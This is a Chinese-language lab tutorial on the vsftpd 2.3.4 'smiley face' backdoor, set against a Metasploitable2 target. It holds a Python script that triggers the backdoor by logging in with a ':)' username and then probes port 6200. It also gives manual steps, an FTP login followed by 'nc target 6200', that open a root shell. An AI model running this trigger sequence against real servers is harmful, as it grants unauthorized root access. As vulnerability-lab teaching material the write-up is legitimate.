Python指令碼檢測笑臉漏洞
一、漏洞介紹
vsftpd2.3.4中在6200埠存在一個shell,使得任何人都可以進行連線,並且VSFTPD v2.3.4 服務,是以 root 許可權執行的,最終我們提到的許可權也是root;當連線帶有vsftpd 2.3.4版本的伺服器的21埠時,輸入使用者中帶有“😃 ”,密碼任意,因此也稱為笑臉漏洞。
二、環境搭建
攻擊機(本機):125.217.53.182
靶機(metaspolit2):192.168.126.129
namp漏洞掃描
我們發現21埠是開啟的,而且版本也相對應,接下來我們使用python指令碼進行漏洞檢測
import socket
from ftplib import FTP
url = input("請輸入你需要檢測的地址:")
ftp = FTP()
username = 'root:)' #使用者名稱必須包含:)這兩個字元
password = 'anonymous' #密碼隨便啥都行
try:
ftp.connect(url,21,timeout=10)#使用ftp登入,設定延時10秒
ftp.login(username,password)
ftp.quit()
except:
print("完成登入檢測")
try:
s = socket.socket() #使用socket函式來檢測是否有漏洞存在
s.connect((url,6200))
s.close()
print("存在微笑漏洞")
except:
print("沒有發現笑臉漏洞!")
輸入我們需要攻擊的ip地址,
發現存在笑臉漏洞
三、漏洞復現
(一)使用nc進行漏洞利用
1、開啟命令列登入ftp伺服器,在使用者名稱處輸入xiaofeng:)然後隨意輸入一個密碼回車等待,緊接著進行下一步:
2、開啟一個新視窗,輸入nc 目標ip 6200 即可連線。
復現完成